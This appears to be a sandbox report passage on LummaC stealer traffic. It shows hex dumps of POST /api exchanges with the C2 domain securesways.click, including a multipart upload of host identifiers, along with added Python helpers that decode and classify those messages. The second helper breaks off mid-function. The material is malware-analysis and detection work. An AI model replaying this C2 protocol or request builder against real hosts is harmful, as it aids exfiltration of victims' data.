                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC236INData Raw: 34 39 31 63 0d 0a 4a 31 73 4e 45 4a 39 6b 37 65 6e 52 59 33 53 35 61 33 66 2b 6c 67 73 66 58 53 44 47 52 44 6d 4f 73 4f 56 74 57 6d 4c 48 59 72 35 63 65 58 73 79 70 56 44 42 79 36 49 47 56 6f 4d 66 42 59 76 7a 4a 7a 30 38 52 4f 52 2b 58 2b 2f 63 6c 67 68 32 51 4c 45 50 6e 42 30 39 62 48 7a 73 41 63 48 4c 74 42 74 57 67 7a 41 4d 33 50 4e 6c 50 57 63 43 6f 79 35 62 37 39 79 48 44 44 45 4e 74 77 37 64 54 7a 64 71 65 50 6f 48 69 59 69 39 44 68 48 63 44 68 61 55 2b 47 4a 79 4e 55 33 6b 61 42 76 72 79 73 64 58 65 43 2b 69 46 74 39 71 4f 6e 35 37 76 52 6e 42 6b 76 4d 47 47 70 74 52 56 5a 2f 7a 61 58 4d 37 52 4b 30 73 55 65 62 55 68 67 6b 77 45 71 34 45 31 6b 38 35 61 58 6e 77 44 70 32 46 74 77 6b 61 32 67
                                                                                                                                                                                                                                              Data Ascii: 491cJ1sNEJ9k7enRY3S5a3f+lgsfXSDGRDmOsOVtWmLHYr5ceXsypVDBy6IGVoMfBYvzJz08ROR+X+/clgh2QLEPnB09bHzsAcHLtBtWgzAM3PNlPWcCoy5b79yHDDENtw7dTzdqePoHiYi9DhHcDhaU+GJyNU3kaBvrysdXeC+iFt9qOn57vRnBkvMGGptRVZ/zaXM7RK0sUebUhgkwEq4E1k85aXnwDp2Ftwka2g
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 51 57 33 4c 6f 70 65 69 63 43 2f 47 59 49 33 74 47 57 48 69 30 4e 74 51 61 63 57 6e 64 32 4d 76 6f 4b 7a 39 50 7a 43 52 72 56 44 42 61 54 38 32 68 39 4c 55 32 6b 4a 56 50 6b 31 6f 30 41 4e 77 2b 72 43 74 74 4e 4d 47 68 39 2b 67 36 4a 68 4c 42 42 57 4a 73 4f 44 64 79 73 4b 56 30 76 51 61 63 79 56 76 32 53 6d 45 45 68 51 4b 49 4d 6e 42 31 35 61 58 7a 38 43 34 2b 5a 75 77 6f 64 33 68 73 65 6c 66 6c 6b 66 54 4a 49 71 79 56 62 36 39 69 4e 41 44 49 45 71 41 33 61 52 54 6b 76 50 4c 30 42 6c 38 76 72 51 54 58 65 47 52 4b 51 34 69 74 48 66 31 33 71 50 78 76 72 33 73 64 58 65 41 69 67 41 39 39 4f 4e 6d 78 36 39 68 53 50 6d 62 55 4d 45 38 6b 50 45 4a 4c 2b 61 6d 38 31 54 4b 49 6c 55 75 66 62 67 67 67 38 51 4f 74 41 32 31 31 35 4e 7a 4c 63 43 34 53 48 75 52 59 57 6d
                                                                                                                                                                                                                                              Data Ascii: QW3LopeicC/GYI3tGWHi0NtQacWnd2MvoKz9PzCRrVDBaT82h9LU2kJVPk1o0ANw+rCttNMGh9+g6JhLBBWJsODdysKV0vQacyVv2SmEEhQKIMnB15aXz8C4+Zuwod3hselflkfTJIqyVb69iNADIEqA3aRTkvPL0Bl8vrQTXeGRKQ4itHf13qPxvr3sdXeAigA99ONmx69hSPmbUME8kPEJL+am81TKIlUufbggg8QOtA2115NzLcC4SHuRYWm
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 30 5a 57 38 7a 53 4b 49 70 56 75 43 53 79 55 38 2f 47 4f 56 59 6e 47 38 36 65 33 48 33 52 4c 71 49 76 51 38 52 7a 55 6b 4b 30 75 30 70 65 6a 4d 43 2f 47 5a 57 37 64 71 42 48 54 63 4e 70 67 37 53 53 6a 78 67 65 76 30 47 67 6f 36 33 43 68 33 59 42 42 47 4f 2f 6d 6c 31 4f 6b 4f 75 4c 42 75 69 6b 6f 41 58 65 46 6a 6c 4d 63 74 4f 65 31 70 78 38 77 69 49 6e 66 4d 65 57 4d 4a 4a 45 70 43 30 4d 54 30 79 53 71 45 6a 56 4f 33 59 69 51 6f 79 44 4b 30 4f 33 31 63 32 61 33 4c 78 44 6f 57 47 76 51 55 65 30 67 49 65 6d 76 52 6f 64 33 38 4d 35 43 46 44 72 49 72 48 4f 7a 38 4d 71 41 2b 65 63 44 70 68 66 50 6f 51 7a 35 54 39 47 46 62 63 42 56 58 45 74 47 56 30 50 30 6d 75 49 6c 76 72 33 34 49 4d 50 77 4f 6f 42 39 5a 4c 50 6d 74 2b 39 41 75 4a 69 37 51 46 45 38 6b 4d 48 4a
                                                                                                                                                                                                                                              Data Ascii: 0ZW8zSKIpVuCSyU8/GOVYnG86e3H3RLqIvQ8RzUkK0u0pejMC/GZW7dqBHTcNpg7SSjxgev0Ggo63Ch3YBBGO/ml1OkOuLBuikoAXeFjlMctOe1px8wiInfMeWMJJEpC0MT0ySqEjVO3YiQoyDK0O31c2a3LxDoWGvQUe0gIemvRod38M5CFDrIrHOz8MqA+ecDphfPoQz5T9GFbcBVXEtGV0P0muIlvr34IMPwOoB9ZLPmt+9AuJi7QFE8kMHJ
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 4d 56 54 6b 4f 52 58 31 6b 6f 41 44 65 46 6a 6c 43 64 56 58 4e 32 46 37 38 41 43 48 6a 4c 30 4d 48 64 30 43 45 70 76 79 5a 48 55 79 52 36 63 6e 58 2b 62 41 68 41 51 79 44 61 39 41 6b 67 55 2b 64 7a 4b 6c 52 71 69 48 6d 68 45 4e 79 52 39 56 67 37 70 77 50 54 68 4f 35 48 34 62 37 39 32 4f 41 44 41 49 71 67 2f 59 53 7a 39 70 66 2f 67 4a 68 5a 6d 37 44 78 76 51 42 68 36 4f 39 47 52 35 4d 30 61 73 4c 56 47 73 6e 4d 63 49 49 45 44 39 51 4f 6c 49 4e 6d 39 78 36 30 61 51 78 61 70 42 45 64 64 4a 54 64 7a 34 5a 33 30 77 54 71 67 74 55 2b 33 65 69 51 67 39 43 61 30 49 7a 6b 51 39 5a 33 50 7a 43 59 36 50 74 67 51 53 33 41 30 54 6b 37 51 6e 50 54 68 61 35 48 34 62 77 2f 57 79 54 52 6b 36 35 52 2b 53 58 48 6c 6f 66 72 31 65 7a 34 65 77 44 52 37 55 44 78 79 51 2f 6d 42
                                                                                                                                                                                                                                              Data Ascii: MVTkORX1koADeFjlCdVXN2F78ACHjL0MHd0CEpvyZHUyR6cnX+bAhAQyDa9AkgU+dzKlRqiHmhENyR9Vg7pwPThO5H4b792OADAIqg/YSz9pf/gJhZm7DxvQBh6O9GR5M0asLVGsnMcIIED9QOlINm9x60aQxapBEddJTdz4Z30wTqgtU+3eiQg9Ca0IzkQ9Z3PzCY6PtgQS3A0Tk7QnPTha5H4bw/WyTRk65R+SXHlofr1ez4ewDR7UDxyQ/mB
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 79 4a 59 36 4e 65 49 44 6a 6b 47 74 77 66 56 56 7a 64 69 66 66 55 4f 68 6f 71 33 42 42 76 64 42 52 2b 64 38 32 64 7a 4e 77 4c 71 5a 6c 7a 30 6b 74 39 50 47 52 43 2b 45 73 70 49 47 47 4a 39 76 52 6e 42 6b 76 4d 47 47 70 74 52 56 5a 58 6d 62 58 41 74 53 36 4d 6f 56 4f 2f 41 68 67 49 7a 45 71 49 50 32 45 49 31 61 58 33 37 42 34 71 42 76 77 59 54 30 41 59 5a 33 4c 6f 70 65 69 63 43 2f 47 5a 31 35 38 47 51 44 44 59 4c 73 78 75 63 57 6e 64 32 4d 76 6f 4b 7a 39 50 7a 41 68 33 51 44 52 57 51 39 47 31 77 50 31 43 72 49 56 7a 6c 32 5a 55 46 50 77 65 75 43 4e 64 4b 50 33 31 2b 38 78 53 4b 6d 61 46 42 57 4a 73 4f 44 64 79 73 4b 55 73 34 55 72 51 6c 47 64 33 45 68 42 6b 7a 44 61 6c 41 77 77 73 67 4c 33 58 78 52 74 66 4c 74 51 34 66 32 41 59 55 6c 66 68 6b 65 44 5a 48
                                                                                                                                                                                                                                              Data Ascii: yJY6NeIDjkGtwfVVzdiffUOhoq3BBvdBR+d82dzNwLqZlz0kt9PGRC+EspIGGJ9vRnBkvMGGptRVZXmbXAtS6MoVO/AhgIzEqIP2EI1aX37B4qBvwYT0AYZ3LopeicC/GZ158GQDDYLsxucWnd2MvoKz9PzAh3QDRWQ9G1wP1CrIVzl2ZUFPweuCNdKP31+8xSKmaFBWJsODdysKUs4UrQlGd3EhBkzDalAwwsgL3XxRtfLtQ4f2AYUlfhkeDZH
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 66 63 74 51 77 6a 51 4c 70 4f 78 51 55 2b 59 7a 4b 6c 52 6f 79 4d 73 41 41 63 30 67 55 61 6d 2f 42 37 64 7a 68 51 70 53 64 51 34 64 36 48 41 6a 55 4b 70 41 6e 52 53 54 52 6f 64 66 49 44 7a 38 58 7a 42 67 36 62 55 56 57 39 2b 57 4a 78 5a 42 6a 6b 4f 52 58 31 6b 6f 41 44 65 46 6a 6c 41 4e 5a 41 4d 32 4a 78 38 67 57 64 69 72 55 54 46 74 59 44 42 35 62 2f 62 48 41 79 54 36 63 67 58 65 66 65 6c 51 59 34 41 36 35 41 6b 67 55 2b 64 7a 4b 6c 52 71 79 63 70 51 73 52 31 78 38 65 6e 66 64 2f 63 43 38 43 36 6d 5a 4b 36 38 50 48 56 79 34 51 73 67 66 44 43 79 41 76 64 66 46 47 31 38 75 31 43 42 44 63 44 78 75 4f 38 57 39 79 4d 45 75 74 49 6c 50 76 30 6f 4d 4c 50 77 57 6d 44 4e 64 43 4f 6d 42 32 39 41 69 47 68 50 4e 50 56 74 77 52 56 63 53 30 53 47 59 38 54 71 6c 6d 52
                                                                                                                                                                                                                                              Data Ascii: fctQwjQLpOxQU+YzKlRoyMsAAc0gUam/B7dzhQpSdQ4d6HAjUKpAnRSTRodfIDz8XzBg6bUVW9+WJxZBjkORX1koADeFjlANZAM2Jx8gWdirUTFtYDB5b/bHAyT6cgXefelQY4A65AkgU+dzKlRqycpQsR1x8enfd/cC8C6mZK68PHVy4QsgfDCyAvdfFG18u1CBDcDxuO8W9yMEutIlPv0oMLPwWmDNdCOmB29AiGhPNPVtwRVcS0SGY8TqlmR
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 50 64 6b 43 69 47 4a 77 64 65 55 39 35 36 77 4f 49 6e 66 45 30 46 64 55 48 45 6f 71 30 64 6b 4a 78 41 71 73 38 47 37 54 72 6e 6b 38 2f 44 4f 56 59 6e 46 41 2b 62 33 58 6e 45 49 69 48 6f 67 6f 62 31 79 73 61 6d 2b 4a 71 63 6a 78 54 72 57 70 51 34 5a 4c 4a 54 7a 38 59 35 56 69 63 61 6a 35 35 63 64 49 46 6e 6f 4c 7a 54 31 62 63 48 31 58 45 74 46 63 39 4c 55 47 30 4a 56 54 39 37 4d 64 58 49 54 37 6c 43 38 70 43 4b 57 78 6b 39 67 75 44 6d 6f 31 42 54 6f 39 62 52 38 36 6d 4f 32 4a 2f 58 5a 74 6f 47 2b 32 53 33 7a 59 68 51 4c 4e 41 68 42 64 33 4c 32 43 39 58 73 2f 4d 73 42 4d 45 33 51 6f 44 6e 37 4e 58 51 78 68 55 72 69 46 4c 36 38 57 49 54 33 5a 41 71 6b 43 45 66 48 6c 6d 64 65 59 58 6d 59 61 6a 42 6c 62 6b 52 31 57 45 74 44 45 39 43 6b 47 71 4b 46 7a 36 77 38
                                                                                                                                                                                                                                              Data Ascii: PdkCiGJwdeU956wOInfE0FdUHEoq0dkJxAqs8G7Trnk8/DOVYnFA+b3XnEIiHogob1ysam+JqcjxTrWpQ4ZLJTz8Y5Vicaj55cdIFnoLzT1bcH1XEtFc9LUG0JVT97MdXIT7lC8pCKWxk9guDmo1BTo9bR86mO2J/XZtoG+2S3zYhQLNAhBd3L2C9Xs/MsBME3QoDn7NXQxhUriFL68WIT3ZAqkCEfHlmdeYXmYajBlbkR1WEtDE9CkGqKFz6w8
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 70 6b 66 69 65 7a 68 69 66 62 45 49 68 49 75 30 45 51 44 41 52 52 32 66 37 6e 4e 44 41 57 6d 6f 49 46 7a 32 31 59 45 70 47 45 44 72 51 4e 4d 46 59 56 59 79 74 55 61 77 78 66 4d 5a 56 6f 4e 4a 49 4a 2f 36 5a 33 6f 70 55 2b 6b 4f 65 4e 62 6f 78 53 4d 2f 46 65 63 30 32 31 55 6f 5a 48 2f 78 52 73 48 4c 74 55 46 4f 69 30 64 56 6d 4f 55 70 4a 57 38 51 2f 33 4d 49 75 34 4c 56 45 48 59 5a 35 52 61 63 48 57 73 68 4d 75 39 47 31 38 76 30 41 67 54 4a 44 78 61 4b 39 79 35 44 41 57 57 71 49 56 72 36 77 70 41 41 42 6a 36 77 41 39 4a 4c 50 6e 6c 6a 76 55 6a 50 68 50 4e 5a 4c 35 74 42 56 61 4f 36 4b 57 56 2f 47 75 51 54 57 4f 4c 63 67 42 6b 70 54 59 49 4f 32 30 51 76 66 32 58 79 52 73 48 4c 74 55 46 4f 69 55 64 56 6d 4f 55 70 4a 57 38 51 2f 33 4d 49 75 34 4c 56 45 48 59
                                                                                                                                                                                                                                              Data Ascii: pkfiezhifbEIhIu0EQDARR2f7nNDAWmoIFz21YEpGEDrQNMFYVYytUawxfMZVoNJIJ/6Z3opU+kOeNboxSM/Fec021UoZH/xRsHLtUFOi0dVmOUpJW8Q/3MIu4LVEHYZ5RacHWshMu9G18v0AgTJDxaK9y5DAWWqIVr6wpAABj6wA9JLPnljvUjPhPNZL5tBVaO6KWV/GuQTWOLcgBkpTYIO20Qvf2XyRsHLtUFOiUdVmOUpJW8Q/3MIu4LVEHY
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 6d 51 7a 66 33 2f 79 41 63 32 72 74 42 63 56 6d 30 64 56 6b 4c 51 78 50 54 35 49 74 43 74 55 36 35 36 41 46 54 39 41 36 30 44 53 42 57 45 76 63 2f 63 57 67 6f 53 30 54 52 44 56 42 31 57 44 75 6e 41 39 4b 51 4c 38 64 52 57 73 77 4d 64 58 65 45 65 6d 45 73 35 44 4f 6e 6c 78 75 6a 69 78 70 71 45 47 42 74 68 4c 4a 4a 48 77 66 32 67 38 55 71 4d 59 5a 63 48 41 67 42 38 37 51 70 51 57 33 30 55 33 61 44 4b 7a 52 70 66 4c 36 30 45 37 79 51 34 46 6e 37 51 6e 50 54 4d 43 2f 47 5a 57 2f 74 57 58 44 48 51 48 76 77 65 63 57 6e 64 32 4d 75 74 47 31 39 6a 39 51 51 53 62 55 56 58 62 2b 6d 52 38 50 45 79 6e 4e 45 6e 71 30 5a 45 4d 66 7a 36 62 4c 63 35 43 4b 57 77 77 7a 41 75 4c 6e 61 59 43 42 74 77 33 4b 37 48 6d 62 6d 30 38 41 49 67 68 56 75 44 73 75 54 67 70 42 37 56 43
                                                                                                                                                                                                                                              Data Ascii: mQzf3/yAc2rtBcVm0dVkLQxPT5ItCtU656AFT9A60DSBWEvc/cWgoS0TRDVB1WDunA9KQL8dRWswMdXeEemEs5DOnlxujixpqEGBthLJJHwf2g8UqMYZcHAgB87QpQW30U3aDKzRpfL60E7yQ4Fn7QnPTMC/GZW/tWXDHQHvwecWnd2MutG19j9QQSbUVXb+mR8PEynNEnq0ZEMfz6bLc5CKWwwzAuLnaYCBtw3K7Hmbm08AIghVuDsuTgpB7VC
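
The rows above show three message shapes from explorer.exe to securesways.click: a urlencoded `act=life` POST answered with a chunked `ok`, an `act=recive_message&ver=4.0&lid=...&j=` POST answered with a large chunked blob the capture cuts off, and (next session) a multipart upload with parts named hwid, pid and lid. The following added example, which is not part of the Joe Sandbox report and not code from the sample, decodes the report's "Data Raw" rows, reassembles the chunked replies (reporting truncation instead of silently accepting a partial chunk) and labels each request by the field set observed here. The hex strings are copied from the rows on this page; the multipart body is constructed to match the truncated upload; the rule "POST /api with an `act=` field or hwid/lid/pid parts is C2 traffic" is an assumption drawn only from this capture, not a general LummaC protocol description.

```python
"""Decode the explorer.exe <-> securesways.click POST /api exchanges shown above.

Added example: not part of the Joe Sandbox report and not code from the sample.
Hex strings are copied from the report's "Data Raw" rows; UPLOAD_BODY is
CONSTRUCTED to match the shape of the truncated multipart upload in session 5.
Treating a POST /api whose body carries an `act=` field, or multipart parts
named hwid/lid/pid, as C2 traffic is an assumption drawn only from this capture.
"""
from __future__ import annotations
import re
from urllib.parse import parse_qs

# Exact User-Agent string sent in every request of this capture (secondary indicator).
OBSERVED_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

def hexdump_to_bytes(row: str) -> bytes:
    """Convert a 'Data Raw: 61 63 74 ...' row (prefix optional) into bytes."""
    return bytes.fromhex(row.split("Data Raw:", 1)[-1].replace(" ", ""))

def dechunk(body: bytes) -> tuple[bytes, bool]:
    """Reassemble an HTTP/1.1 chunked body; returns (payload, complete).
    complete is False when the capture ends before the zero-size chunk, as in
    session 4, where the reply announces a 0x491c-byte chunk but is cut off."""
    out, pos = bytearray(), 0
    while True:
        end = body.find(b"\r\n", pos)
        if end <= pos:                        # no size line left: truncated or malformed
            return bytes(out), False
        size = int(body[pos:end].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out), True
        pos = end + 2
        out += body[pos:pos + size]
        pos += size + 2                       # step over the chunk's trailing CRLF

def parse_request(raw: bytes) -> tuple[str, dict[str, str], bytes]:
    """Split a raw HTTP request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def parse_form(body: bytes, content_type: str) -> dict[str, str]:
    """Fields of a urlencoded or multipart/form-data body (first value per name)."""
    boundary = re.search(r"boundary=([^;\s]+)", content_type)
    if content_type.startswith("multipart/form-data") and boundary:
        delim, fields = b"--" + boundary.group(1).encode(), {}
        for part in body.split(delim)[1:]:
            if part.startswith(b"--"):        # closing delimiter "--boundary--"
                break
            head, _, value = part.partition(b"\r\n\r\n")
            name = re.search(rb'name="([^"]*)"', head)
            if name:
                fields[name.group(1).decode()] = value.rstrip(b"\r\n").decode("latin-1")
        return fields
    qs = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}

def classify(raw_request: bytes) -> str | None:
    """Label a request by the C2 message shape seen in this capture, else None."""
    request_line, headers, body = parse_request(raw_request)
    if not request_line.startswith("POST /api "):
        return None
    fields = parse_form(body, headers.get("content-type", ""))
    if "act" in fields:                       # sessions 3 and 4: act=life, act=recive_message
        return "act=" + fields["act"]
    if {"hwid", "lid", "pid"} <= fields.keys():   # session 5: data upload
        return "multipart:hwid,lid,pid"
    return None

def build_request(content_type: str, body: bytes) -> bytes:
    """Assemble a request with the header set the sample sends in sessions 4 and 5."""
    head = (f"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: {content_type}\r\n"
            f"User-Agent: {OBSERVED_UA}\r\nContent-Length: {len(body)}\r\nHost: securesways.click\r\n\r\n")
    return head.encode("latin-1") + body

# Copied from the Data Raw rows above.
LIFE_BODY = hexdump_to_bytes("Data Raw: 61 63 74 3d 6c 69 66 65")
LIFE_REPLY = hexdump_to_bytes("32 0d 0a 6f 6b 0d 0a") + hexdump_to_bytes("30 0d 0a 0d 0a")
RECIVE_BODY = hexdump_to_bytes("61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 "
                               "3d 34 2e 30 26 6c 69 64 3d 41 42 31 35 67 31 2d 2d 26 6a 3d")
RECIVE_REPLY_PREFIX = hexdump_to_bytes("34 39 31 63 0d 0a 4a 31 73 4e 45 4a 39 6b 37 65 6e 52 59 33 53 35 61 33")
# CONSTRUCTED: the three parts visible in session 5 plus a closing delimiter the
# capture does not show (the real upload is 12770 bytes and continues).
UPLOAD_BODY = (b'--WJQPB7AN\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
               b'E86646F8C7B0B95CAC8923850305D13E\r\n'
               b'--WJQPB7AN\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n'
               b'--WJQPB7AN\r\nContent-Disposition: form-data; name="lid"\r\n\r\nAB15g1--\r\n'
               b'--WJQPB7AN--\r\n')
URLENC, MULTI = "application/x-www-form-urlencoded", "multipart/form-data; boundary=WJQPB7AN"

def demo() -> dict[str, object]:
    """Run the helpers over the captured rows and return the results."""
    return {
        "life": classify(build_request(URLENC, LIFE_BODY)),
        "life_reply": dechunk(LIFE_REPLY),                       # (b"ok", True)
        "recive": classify(build_request(URLENC, RECIVE_BODY)),
        "recive_fields": parse_form(RECIVE_BODY, URLENC),
        "recive_reply": dechunk(RECIVE_REPLY_PREFIX),            # truncated: complete=False
        "upload": classify(build_request(MULTI, UPLOAD_BODY)),
        "upload_fields": parse_form(UPLOAD_BODY, MULTI),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The classifier deliberately keys on body shape rather than on the Host header, since the domain is disposable while the `act=` vocabulary and the hwid/lid/pid upload fields are what a network detection can match across C2 domains; the User-Agent is kept only as a secondary indicator because any browser can send it. `dechunk` returning `complete=False` for session 4 documents that the reply's declared chunk length (0x491c bytes) exceeds what the sandbox captured, so nothing should be inferred about the blob's tail.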


Session ID: 5
Source IP: 192.168.2.5 | Source Port: 49821 | Destination IP: 104.21.16.1 | Destination Port: 443 | PID: 940 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 14:00:00 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WJQPB7AN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12770
Host: securesways.click
2024-12-21 14:00:00 UTC | 12770 | OUT | Data Raw: 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
Data Ascii (CRLF shown as \r\n, dump truncated after 256 bytes): --WJQPB7AN\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nE86646F8C7B0B95CAC8923850305D13E\r\n--WJQPB7AN\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n--WJQPB7AN\r\nContent-Disposition: form-data; name="lid"\r\n\r\nAB15g1--\r\n--WJQPB7AN\r\nContent-Disposition: 
2024-12-21 14:00:02 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 14:00:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ra5mu2upjt6a80hreecp9nc9e3; expires=Wed, 16 Apr 2025 07:46:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2e0BDzW0CBecxqnOd7hDG9GnKPIBlACGGi5KLlz4sfGsu56pMXn8JgkURMwkca3EiSEJr%2BmYCvo6Rvpq3X3GXfpn61%2Bl2l4GmXGIiAPWmKyZ%2Fsg0BynINCdMMOxdT2G8C8HZBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58655dfc398ce0-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=1950&rtt_var=781&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13701&delivery_rate=1497435&cwnd=211&unsent_bytes=0&cid=eea858fd3c84c347&ts=1403&x=0"
                                                                                                                                                                                                                                              2024-12-21 14:00:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-21 14:00:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0
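The exchange above is the whole C2 protocol this report makes visible: a multipart/form-data POST to /api carrying hwid, pid and lid fields, answered by a chunked body of the form "ok <ip>". The Python below is an added example, not part of the Joe Sandbox report and not LummaC or Joe Sandbox code; it decodes that exchange from the report's own hex dumps so the field values and the reply can be read directly. Assumptions: the request hex is the report's truncated "Data Raw" dump (only the first three parts are complete, the fourth is cut off mid-header), the response hex is the two reply fragments concatenated, the multipart splitter is a deliberately small hand-written one for the Content-Disposition form seen here rather than a general RFC 7578 implementation, and the boundary is read from the body's first delimiter line because the Content-Type header lies outside the dump.

```python
"""Added example (not part of the Joe Sandbox report): decode the captured
LummaC POST /api exchange from its raw hex.

CAPTURED_REQUEST_HEX is the report's truncated "Data Raw" dump of the
12770-byte body sent to securesways.click; only the first three multipart
parts are complete. CAPTURED_RESPONSE_HEX is the two chunked fragments that
followed the HTTP/1.1 200 OK.
"""
import re

CAPTURED_REQUEST_HEX = (
    "2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 "
    "6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 "
    "3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 "
    "39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 "
    "4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 "
    "74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 "
    "69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f "
    "6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d "
    "64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 "
    "67 31 2d 2d 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e "
    "74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20"
)

# Both "Data Raw" fragments of the reply, concatenated (Transfer-Encoding: chunked).
CAPTURED_RESPONSE_HEX = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a "
    "30 0d 0a 0d 0a"
)


def boundary_from_body(body: bytes) -> str:
    """Read the boundary from the body's first delimiter line ('--<boundary>\\r\\n').

    Used because the Content-Type header is not part of the dump.
    """
    first_line = body.split(b"\r\n", 1)[0]
    if not first_line.startswith(b"--"):
        raise ValueError("body does not start with a multipart delimiter")
    return first_line[2:].decode("ascii")


def parse_multipart(body: bytes, boundary: str):
    """Minimal multipart/form-data splitter: returns ({name: value}, incomplete_parts).

    Handles only the plain Content-Disposition form seen in this capture. A part
    whose header block or value is cut off (as in the truncated dump) is counted
    in incomplete_parts instead of being guessed.
    """
    delim = b"--" + boundary.encode("ascii")
    fields = {}
    incomplete = 0
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # '--<boundary>--' closes the body
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, sep, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        # A complete value is always followed by CRLF before the next delimiter.
        if not sep or not match or not value.endswith(b"\r\n"):
            incomplete += 1
            continue
        fields[match.group(1).decode("ascii")] = value[:-2]
    return fields, incomplete


def dechunk(raw: bytes) -> bytes:
    """Reassemble a chunked transfer-coding body (RFC 9112 section 7.1)."""
    out = bytearray()
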